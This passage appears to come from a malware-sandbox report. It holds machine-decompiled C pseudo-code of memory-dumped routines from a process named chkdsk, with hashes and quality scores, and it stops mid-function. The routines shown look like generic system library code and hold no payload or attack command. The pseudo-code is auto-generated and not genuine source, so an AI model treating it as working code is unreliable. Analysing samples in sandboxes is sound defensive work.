                                                      										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                      											_t85 = _t85 & 0xff000000;
                                                      										}
                                                      										 *(_t90 + 0x14) = _t85;
                                                      									}
                                                      									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                      									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                      									return 0;
                                                      								}
                                                      								_v5 = 1;
                                                      								_t87 = _t74;
                                                      								goto L19;
                                                      							}
                                                      						}
                                                      						_t94 = _t74;
                                                      						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                      						if(_t74 == 0) {
                                                      							goto L12;
                                                      						} else {
                                                      							_t91 = _t90 + 4;
                                                      							goto L8;
                                                      							L9:
                                                      							while((_t81 & 0x00000001) != 0) {
                                                      								_t69 = _t81;
                                                      								asm("lock cmpxchg [edi], edx");
                                                      								if(_t69 != _t81) {
                                                      									_t81 = _t69;
                                                      									continue;
                                                      								}
                                                      								_t90 = _v16;
                                                      								goto L25;
                                                      							}
                                                      							asm("pause");
                                                      							_t94 = _t94 - 1;
                                                      							if(_t94 != 0) {
                                                      								L8:
                                                      								_t81 =  *_t91;
                                                      								goto L9;
                                                      							} else {
                                                      								_t90 = _v16;
                                                      								_t79 = _v5;
                                                      								goto L12;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}





























                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                      • Instruction ID: 7b55e2ab05584d4aa66f7fc188e00c511ddf8efc0d19fc04080e1446926a5992
                                                      • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                      • Instruction Fuzzy Hash: DD51AB30B04249ABDF24CF6980907AEBBF1BB05314F2881AED589D7281D375BD89D791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E04E5740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                      				signed short* _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _t55;
                                                      				void* _t56;
                                                      				intOrPtr* _t66;
                                                      				intOrPtr* _t69;
                                                      				void* _t74;
                                                      				intOrPtr* _t78;
                                                      				intOrPtr* _t81;
                                                      				intOrPtr* _t82;
                                                      				intOrPtr _t83;
                                                      				signed short* _t84;
                                                      				intOrPtr _t85;
                                                      				signed int _t87;
                                                      				intOrPtr* _t90;
                                                      				intOrPtr* _t93;
                                                      				intOrPtr* _t94;
                                                      				void* _t98;
                                                      
                                                      				_t84 = __edx;
                                                      				_t80 = __ecx;
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t55 = __ecx;
                                                      				_v8 = __edx;
                                                      				_t87 =  *__edx & 0x0000ffff;
                                                      				_v12 = __ecx;
                                                      				_t3 = _t55 + 0x154; // 0x154
                                                      				_t93 = _t3;
                                                      				_t78 =  *_t93;
                                                      				_t4 = _t87 + 2; // 0x2
                                                      				_t56 = _t4;
                                                      				while(_t78 != _t93) {
                                                      					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                      						L4:
                                                      						_t78 =  *_t78;
                                                      						continue;
                                                      					} else {
                                                      						_t7 = _t78 + 0x18; // 0x18
                                                      						if(E04DDD4F0(_t7, _t84[2], _t87) == _t87) {
                                                      							_t40 = _t78 + 0xc; // 0xc
                                                      							_t94 = _t40;
                                                      							_t90 =  *_t94;
                                                      							while(_t90 != _t94) {
                                                      								_t41 = _t90 + 8; // 0x8
                                                      								_t74 = E04DCF380(_a4, _t41, 0x10);
                                                      								_t98 = _t98 + 0xc;
                                                      								if(_t74 != 0) {
                                                      									_t90 =  *_t90;
                                                      									continue;
                                                      								}
                                                      								goto L12;
                                                      							}
                                                      							_t82 = L04DA4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                      							if(_t82 != 0) {
                                                      								_t46 = _t78 + 0xc; // 0xc
                                                      								_t69 = _t46;
                                                      								asm("movsd");
                                                      								asm("movsd");
                                                      								asm("movsd");
                                                      								asm("movsd");
                                                      								_t85 =  *_t69;
                                                      								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                      									L20:
                                                      									_t82 = 3;
                                                      									asm("int 0x29");
                                                      								}
                                                      								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                      								 *_t82 = _t85;
                                                      								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                      								 *_t69 = _t82;
                                                      								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                      								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                      								goto L11;
                                                      							} else {
                                                      								L18:
                                                      								_push(0xe);
                                                      								_pop(0);
                                                      							}
                                                      						} else {
                                                      							_t84 = _v8;
                                                      							_t9 = _t87 + 2; // 0x2
                                                      							_t56 = _t9;
                                                      							goto L4;
                                                      						}
                                                      					}
                                                      					L12:
                                                      					return 0;
                                                      				}
                                                      				_t10 = _t87 + 0x1a; // 0x1a
                                                      				_t78 = L04DA4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                      				if(_t78 == 0) {
                                                      					goto L18;
                                                      				} else {
                                                      					_t12 = _t87 + 2; // 0x2
                                                      					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                      					_t16 = _t78 + 0x18; // 0x18
                                                      					E04DCF3E0(_t16, _v8[2], _t87);
                                                      					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                      					_t19 = _t78 + 0xc; // 0xc
                                                      					_t66 = _t19;
                                                      					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                      					 *_t66 = _t66;
                                                      					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                      					_t81 = L04DA4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                      					if(_t81 == 0) {
                                                      						goto L18;
                                                      					} else {
                                                      						_t26 = _t78 + 0xc; // 0xc
                                                      						_t69 = _t26;
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						_t85 =  *_t69;
                                                      						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                      							goto L20;
                                                      						} else {
                                                      							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                      							 *_t81 = _t85;
                                                      							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                      							 *_t69 = _t81;
                                                      							_t83 = _v12;
                                                      							 *(_t78 + 8) = 1;
                                                      							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                      							_t34 = _t83 + 0x154; // 0x1ba
                                                      							_t69 = _t34;
                                                      							_t85 =  *_t69;
                                                      							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                      								goto L20;
                                                      							} else {
                                                      								 *_t78 = _t85;
                                                      								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                      								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                      								 *_t69 = _t78;
                                                      								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                      							}
                                                      						}
                                                      						goto L11;
                                                      					}
                                                      				}
                                                      				goto L12;
                                                      			}





















                                                      0x04e5748e
                                                      0x04e57493
                                                      0x04e57493
                                                      0x04e57496
                                                      0x04e57499
                                                      0x04e574a1
                                                      0x04e574b1
                                                      0x04e574b5
                                                      0x00000000
                                                      0x04e574bb
                                                      0x04e574c1
                                                      0x04e574c1
                                                      0x04e574c4
                                                      0x04e574c5
                                                      0x04e574c6
                                                      0x04e574c7
                                                      0x04e574c8
                                                      0x04e574cd
                                                      0x00000000
                                                      0x04e574d3
                                                      0x04e574d3
                                                      0x04e574d6
                                                      0x04e574d8
                                                      0x04e574db
                                                      0x04e574dd
                                                      0x04e574e0
                                                      0x04e574e7
                                                      0x04e574ee
                                                      0x04e574ee
                                                      0x04e574f4
                                                      0x04e574f9
                                                      0x00000000
                                                      0x04e574fb
                                                      0x04e574fb
                                                      0x04e574fd
                                                      0x04e57500
                                                      0x04e57503
                                                      0x04e57505
                                                      0x04e57505
                                                      0x04e574f9
                                                      0x00000000
                                                      0x04e574cd
                                                      0x04e574b5
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                      • Instruction ID: f57346c10aad3013031a2b84b3cdb3d53c86c2443a368d8744f5c2c92581a68d
                                                      • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                      • Instruction Fuzzy Hash: C8516B71A00606EFDB15CF54C480A96BBB5FF45308F19C1AAE9089F262E371F956CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E04DB2990() {
                                                      				signed int* _t62;
                                                      				signed int _t64;
                                                      				intOrPtr _t66;
                                                      				signed short* _t69;
                                                      				intOrPtr _t76;
                                                      				signed short* _t79;
                                                      				void* _t81;
                                                      				signed int _t82;
                                                      				signed short* _t83;
                                                      				signed int _t87;
                                                      				intOrPtr _t91;
                                                      				void* _t98;
                                                      				signed int _t99;
                                                      				void* _t101;
                                                      				signed int* _t102;
                                                      				void* _t103;
                                                      				void* _t104;
                                                      				void* _t107;
                                                      
                                                      				_push(0x20);
                                                      				_push(0x4e5ff00);
                                                      				E04DDD08C(_t81, _t98, _t101);
                                                      				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                      				_t99 = 0;
                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                      				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                      				if(_t82 == 0) {
                                                      					_t62 = 0xc0000100;
                                                      				} else {
                                                      					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                      					_t102 = 0xc0000100;
                                                      					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                      					_t64 = 4;
                                                      					while(1) {
                                                      						 *(_t103 - 0x24) = _t64;
                                                      						if(_t64 == 0) {
                                                      							break;
                                                      						}
                                                      						_t87 = _t64 * 0xc;
                                                      						 *(_t103 - 0x2c) = _t87;
                                                      						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4d61664));
                                                      						if(_t107 <= 0) {
                                                      							if(_t107 == 0) {
                                                      								_t79 = E04DCE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4d61668)), _t82);
                                                      								_t104 = _t104 + 0xc;
                                                      								__eflags = _t79;
                                                      								if(__eflags == 0) {
                                                      									_t102 = E04E051BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x4d6166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                      									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                      									break;
                                                      								} else {
                                                      									_t64 =  *(_t103 - 0x24);
                                                      									goto L5;
                                                      								}
                                                      								goto L13;
                                                      							} else {
                                                      								L5:
                                                      								_t64 = _t64 - 1;
                                                      								continue;
                                                      							}
                                                      						}
                                                      						break;
                                                      					}
                                                      					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                      					__eflags = _t102;
                                                      					if(_t102 < 0) {
                                                      						__eflags = _t102 - 0xc0000100;
                                                      						if(_t102 == 0xc0000100) {
                                                      							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                      							__eflags = _t83;
                                                      							if(_t83 != 0) {
                                                      								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                      								__eflags =  *_t83 - _t99;
                                                      								if( *_t83 == _t99) {
                                                      									_t102 = 0xc0000100;
                                                      									goto L19;
                                                      								} else {
                                                      									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                      									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                      									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                      									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                      										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                      										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                      											L26:
                                                      											_t102 = E04DB2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                      											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                      											__eflags = _t102 - 0xc0000100;
                                                      											if(_t102 != 0xc0000100) {
                                                      												goto L12;
                                                      											} else {
                                                      												_t99 = 1;
                                                      												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                      												goto L18;
                                                      											}
                                                      										} else {
                                                      											_t69 = E04D96600( *((intOrPtr*)(_t91 + 0x1c)));
                                                      											__eflags = _t69;
                                                      											if(_t69 != 0) {
                                                      												goto L26;
                                                      											} else {
                                                      												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                      												goto L18;
                                                      											}
                                                      										}
                                                      									} else {
                                                      										L18:
                                                      										_t102 = E04DB2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                      										L19:
                                                      										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                      										goto L12;
                                                      									}
                                                      								}
                                                      								L28:
                                                      							} else {
                                                      								E04D9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                      								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                      								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                      								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                      								_t76 = E04DB2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                      								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                      								__eflags = _t76 - 0xc0000100;
                                                      								if(_t76 == 0xc0000100) {
                                                      									 *((intOrPtr*)(_t103 - 0x1c)) = E04DB2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                      								}
                                                      								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                      								E04DB2ACB();
                                                      							}
                                                      						}
                                                      					}
                                                      					L12:
                                                      					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                      					_t62 = _t102;
                                                      				}
                                                      				L13:
                                                      				return E04DDD0D1(_t62);
                                                      				goto L28;
                                                      			}


                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f652abb7e40462e0ef09d759181a8fcd1cce60f532b85de3ed2f8856c6acaef
                                                      • Instruction ID: ac2993cc67b8ef72b2d3da26ecc17102cd89948f0aa925b02e9be015d0c23735
                                                      • Opcode Fuzzy Hash: 2f652abb7e40462e0ef09d759181a8fcd1cce60f532b85de3ed2f8856c6acaef
                                                      • Instruction Fuzzy Hash: 50514672A00209EFDF25DF55C884ADEBBB5FF48314F118095E856AB260D335E952DBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E04DB4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                      				signed int _v12;
                                                      				char _v176;
                                                      				char _v177;
                                                      				char _v184;
                                                      				intOrPtr _v192;
                                                      				intOrPtr _v196;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed short _t42;
                                                      				char* _t44;
                                                      				intOrPtr _t46;
                                                      				intOrPtr _t50;
                                                      				char* _t57;
                                                      				intOrPtr _t59;
                                                      				intOrPtr _t67;
                                                      				signed int _t69;
                                                      
                                                      				_t64 = __edx;
                                                      				_v12 =  *0x4e7d360 ^ _t69;
                                                      				_t65 = 0xa0;
                                                      				_v196 = __edx;
                                                      				_v177 = 0;
                                                      				_t67 = __ecx;
                                                      				_v192 = __ecx;
                                                      				E04DCFA60( &_v176, 0, 0xa0);
                                                      				_t57 =  &_v176;
                                                      				_t59 = 0xa0;
                                                      				if( *0x4e77bc8 != 0) {
                                                      					L3:
                                                      					while(1) {
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						_t67 = _v192;
                                                      						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                      						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                      						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                      						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                      						_push( &_v184);
                                                      						_push(_t59);
                                                      						_push(_t57);
                                                      						_push(0xa0);
                                                      						_push(_t57);
                                                      						_push(0xf);
                                                      						_t42 = E04DCB0B0();
                                                      						if(_t42 != 0xc0000023) {
                                                      							break;
                                                      						}
                                                      						if(_v177 != 0) {
                                                      							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                      						}
                                                      						_v177 = 1;
                                                      						_t44 = L04DA4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                      						_t59 = _v184;
                                                      						_t57 = _t44;
                                                      						if(_t57 != 0) {
                                                      							continue;
                                                      						} else {
                                                      							_t42 = 0xc0000017;
                                                      							break;
                                                      						}
                                                      					}
                                                      					if(_t42 != 0) {
                                                      						_t65 = E04D8CCC0(_t42);
                                                      						if(_t65 != 0) {
                                                      							L10:
                                                      							if(_v177 != 0) {
                                                      								if(_t57 != 0) {
                                                      									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                      								}
                                                      							}
                                                      							_t46 = _t65;
                                                      							L12:
                                                      							return E04DCB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                      						}
                                                      						L7:
                                                      						_t50 = _a4;
                                                      						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                      						if(_t50 != 3) {
                                                      							if(_t50 == 2) {
                                                      								goto L8;
                                                      							}
                                                      							L9:
                                                      							if(E04DCF380(_t67 + 0xc, 0x4d65138, 0x10) == 0) {
                                                      								 *0x4e760d8 = _t67;
                                                      							}
                                                      							goto L10;
                                                      						}
                                                      						L8:
                                                      						_t64 = _t57 + 0x28;
                                                      						E04DB4F49(_t67, _t57 + 0x28);
                                                      						goto L9;
                                                      					}
                                                      					_t65 = 0;
                                                      					goto L7;
                                                      				}
                                                      				if(E04DB4E70(0x4e786b0, 0x4db5690, 0, 0) != 0) {
                                                      					_t46 = E04D8CCC0(_t56);
                                                      					goto L12;
                                                      				} else {
                                                      					_t59 = 0xa0;
                                                      					goto L3;
                                                      				}
                                                      			}





















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d65833630ad967332dd986e4af92be74a9e32522249d1696450575899d358bf8
                                                      • Instruction ID: a8f855f5f3f30a62629df4f8aa3ff8c658b38bfcb70ac1ce241de144ca076e51
                                                      • Opcode Fuzzy Hash: d65833630ad967332dd986e4af92be74a9e32522249d1696450575899d358bf8
                                                      • Instruction Fuzzy Hash: 6F41AF71B40318EFEB21DF14DD81FAAB7A9EB44614F00409AE9869B281E774FD44CAA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E04DB4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                      				signed int _v8;
                                                      				short _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				char _v36;
                                                      				char _v156;
                                                      				short _v158;
                                                      				intOrPtr _v160;
                                                      				char _v164;
                                                      				intOrPtr _v168;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t45;
                                                      				intOrPtr _t74;
                                                      				signed char _t77;
                                                      				intOrPtr _t84;
                                                      				char* _t85;
                                                      				void* _t86;
                                                      				intOrPtr _t87;
                                                      				signed short _t88;
                                                      				signed int _t89;
                                                      
                                                      				_t83 = __edx;
                                                      				_v8 =  *0x4e7d360 ^ _t89;
                                                      				_t45 = _a8 & 0x0000ffff;
                                                      				_v158 = __edx;
                                                      				_v168 = __ecx;
                                                      				if(_t45 == 0) {
                                                      					L22:
                                                      					_t86 = 6;
                                                      					L12:
                                                      					E04D8CC50(_t86);
                                                      					L11:
                                                      					return E04DCB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                      				}
                                                      				_t77 = _a4;
                                                      				if((_t77 & 0x00000001) != 0) {
                                                      					goto L22;
                                                      				}
                                                      				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                      				if(_t45 !=  *_t8) {
                                                      					goto L22;
                                                      				}
                                                      				_t9 = _t77 + 0x24; // 0x4e78504
                                                      				E04DA2280(_t9, _t9);
                                                      				_t87 = 0x78;
                                                      				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                      				E04DCFA60( &_v156, 0, _t87);
                                                      				_t13 = _t77 + 0x30; // 0x3db8
                                                      				_t85 =  &_v156;
                                                      				_v36 =  *_t13;
                                                      				_v28 = _v168;
                                                      				_v32 = 0;
                                                      				_v24 = 0;
                                                      				_v20 = _v158;
                                                      				_v160 = 0;
                                                      				while(1) {
                                                      					_push( &_v164);
                                                      					_push(_t87);
                                                      					_push(_t85);
                                                      					_push(0x18);
                                                      					_push( &_v36);
                                                      					_push(0x1e);
                                                      					_t88 = E04DCB0B0();
                                                      					if(_t88 != 0xc0000023) {
                                                      						break;
                                                      					}
                                                      					if(_t85 !=  &_v156) {
                                                      						L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                      					}
                                                      					_t84 = L04DA4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                      					_v168 = _v164;
                                                      					if(_t84 == 0) {
                                                      						_t88 = 0xc0000017;
                                                      						goto L19;
                                                      					} else {
                                                      						_t74 = _v160 + 1;
                                                      						_v160 = _t74;
                                                      						if(_t74 >= 0x10) {
                                                      							L19:
                                                      							_t86 = E04D8CCC0(_t88);
                                                      							if(_t86 != 0) {
                                                      								L8:
                                                      								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                      								_t30 = _t77 + 0x24; // 0x4e78504
                                                      								E04D9FFB0(_t77, _t84, _t30);
                                                      								if(_t84 != 0 && _t84 !=  &_v156) {
                                                      									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                      								}
                                                      								if(_t86 != 0) {
                                                      									goto L12;
                                                      								} else {
                                                      									goto L11;
                                                      								}
                                                      							}
                                                      							L6:
                                                      							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                      							if(_v164 != 0) {
                                                      								_t83 = _t84;
                                                      								E04DB4F49(_t77, _t84);
                                                      							}
                                                      							goto L8;
                                                      						}
                                                      						_t87 = _v168;
                                                      						continue;
                                                      					}
                                                      				}
                                                      				if(_t88 != 0) {
                                                      					goto L19;
                                                      				}
                                                      				goto L6;
                                                      			}



























                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2aac44034a711586eba948f58d0496fcc023768a2cef429e42cf1eaed94ca5f7
                                                      • Instruction ID: ce6b149fa58acd12f2ed17ae5c2004daf4ef759470bd5dad61971b8caf769d0e
                                                      • Opcode Fuzzy Hash: 2aac44034a711586eba948f58d0496fcc023768a2cef429e42cf1eaed94ca5f7
                                                      • Instruction Fuzzy Hash: 27418F35A00628DADB31DF64CD40BEAB7B4FF45B10F0101A9E949AB641DB74EE85CBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E04D98A0A(intOrPtr* __ecx, signed int __edx) {
                                                      				signed int _v8;
                                                      				char _v524;
                                                      				signed int _v528;
                                                      				void* _v532;
                                                      				char _v536;
                                                      				char _v540;
                                                      				char _v544;
                                                      				intOrPtr* _v548;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t44;
                                                      				void* _t46;
                                                      				void* _t48;
                                                      				signed int _t53;
                                                      				signed int _t55;
                                                      				intOrPtr* _t62;
                                                      				void* _t63;
                                                      				unsigned int _t75;
                                                      				signed int _t79;
                                                      				unsigned int _t81;
                                                      				unsigned int _t83;
                                                      				signed int _t84;
                                                      				void* _t87;
                                                      
                                                      				_t76 = __edx;
                                                      				_v8 =  *0x4e7d360 ^ _t84;
                                                      				_v536 = 0x200;
                                                      				_t79 = 0;
                                                      				_v548 = __edx;
                                                      				_v544 = 0;
                                                      				_t62 = __ecx;
                                                      				_v540 = 0;
                                                      				_v532 =  &_v524;
                                                      				if(__edx == 0 || __ecx == 0) {
                                                      					L6:
                                                      					return E04DCB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                      				} else {
                                                      					_v528 = 0;
                                                      					E04D9E9C0(1, __ecx, 0, 0,  &_v528);
                                                      					_t44 = _v528;
                                                      					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                      					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                      					_t46 = 0xa;
                                                      					_t87 = _t81 - _t46;
                                                      					if(_t87 > 0 || _t87 == 0) {
                                                      						 *_v548 = 0x4d61180;
                                                      						L5:
                                                      						_t79 = 1;
                                                      						goto L6;
                                                      					} else {
                                                      						_t48 = E04DB1DB5(_t62,  &_v532,  &_v536);
                                                      						_t76 = _v528;
                                                      						if(_t48 == 0) {
                                                      							L9:
                                                      							E04DC3C2A(_t81, _t76,  &_v544);
                                                      							 *_v548 = _v544;
                                                      							goto L5;
                                                      						}
                                                      						_t62 = _v532;
                                                      						if(_t62 != 0) {
                                                      							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                      							_t53 =  *_t62;
                                                      							_v528 = _t53;
                                                      							if(_t53 != 0) {
                                                      								_t63 = _t62 + 4;
                                                      								_t55 = _v528;
                                                      								do {
                                                      									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                      										if(E04D98999(_t63,  &_v540) == 0) {
                                                      											_t55 = _v528;
                                                      										} else {
                                                      											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                      											_t55 = _v528;
                                                      											if(_t75 >= _t83) {
                                                      												_t83 = _t75;
